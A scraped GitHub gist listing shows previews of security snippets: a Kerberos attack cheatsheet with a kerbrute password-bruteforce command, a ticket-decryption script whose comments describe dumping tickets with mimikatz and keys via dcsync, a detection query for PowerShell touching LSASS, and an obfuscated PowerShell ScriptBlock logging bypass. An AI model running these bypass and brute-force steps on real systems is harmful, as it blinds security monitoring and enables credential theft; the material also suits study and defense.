Skip to content

Instantly share code, notes, and snippets.

View W00t3k's full-sized avatar

Adam M Toscher W00t3k

387 followers · 3 following
View GitHub Profile
@TarlogicSecurity
TarlogicSecurity / kerberos_attacks_cheatsheet.md
Created May 14, 2019 13:33
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@xan7r
xan7r / decryptKerbTicket.py
Last active December 29, 2025 20:21
Decrypt kerberos tickets and parse out authorization data
#!/usr/bin/env python2
# NOTE: this script was created for educational purposes to assist learning about kerberos tickets.
# Likely to have a few bugs that cause it to fail to decrypt some TGT or Service tickets.
#
# Recommended Instructions:
# Obtain valid kerberos tickets using Rubeus or mimikatz "sekurlsa::tickets /export"
# Optionally convert tickets to ccache format using kekeo "misc::convert ccache <ticketName.kirbi>"
# Obtain appropriate aes256 key using dcsync (krbtgt for TGT or usually target computer account for Service Ticket)
# Run this script to decrypt:
# ./decryptKerbTicket.py -k 5c7ee0b8f0ffeedbeefdeadbeeff1eefc7d313620feedbeefdeadbeefafd601e -t ./Administrator@TESTLAB.LOCAL_krbtgt~TESTLAB.LOCAL@TESTLAB.LOCAL.ccaches
@curi0usJack
curi0usJack / cbapi-ps-lsass-loop.py
Last active August 23, 2018 13:16
# Carbon Black Evil PowerShell LSASS Query
#
# Prints out malicious Powershell events that have a crossproc event for c:\windows\system32\lsass.exe
#
# Author: Jason Lang (@curi0usJack)
#
# Prereqs (Windows 10)
# Install bash on Win10
# sudo apt-get install python-pip
# sudo pip install --upgrade requests
@W00t3k
W00t3k / ScriptBlockLogBypass.ps1
Created June 10, 2018 23:55 — forked from cobbr/ScriptBlockLogBypass.ps1
ScriptBlock Logging Bypass
# ScriptBlock Logging Bypass
# @cobbr_io
$GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static')
If ($GroupPolicyField) {
$GroupPolicyCache = $GroupPolicyField.GetValue($null)
If ($GroupPolicyCache['ScriptB'+'lockLogging']) {
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0
}
@blark
blark / Get-DNSARecords.ps1
Last active January 17, 2023 12:40
A simple Powershell script to get DNS records from a Microsoft DNS server
function Get-DNSARecords {
<#
.SYNOPSIS
Dumps A Records from a Microsoft Windows DNS server.
.DESCRIPTION
This script dumps the conent of MicrosoftDNS_AType to a CSV file.
.PARAMETER Server
The name of the Computer you want to run the command against.
.PARAMETER CSVPath
@jhaddix
jhaddix / all.txt
Last active December 20, 2025 00:12
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
This file has been truncated, but you can view the full file.
.
..
........
@
*
*.*
*.*.*
🐎
@tomsteele
tomsteele / santa.js
Created December 8, 2014 05:36
santa.js
var Cylon = require('cylon');
var EventEmitter = require('events').EventEmitter;
var Hapi = require('hapi');
var bot = new EventEmitter();
var on = false;
Cylon.robot({
connections: {
arduino: {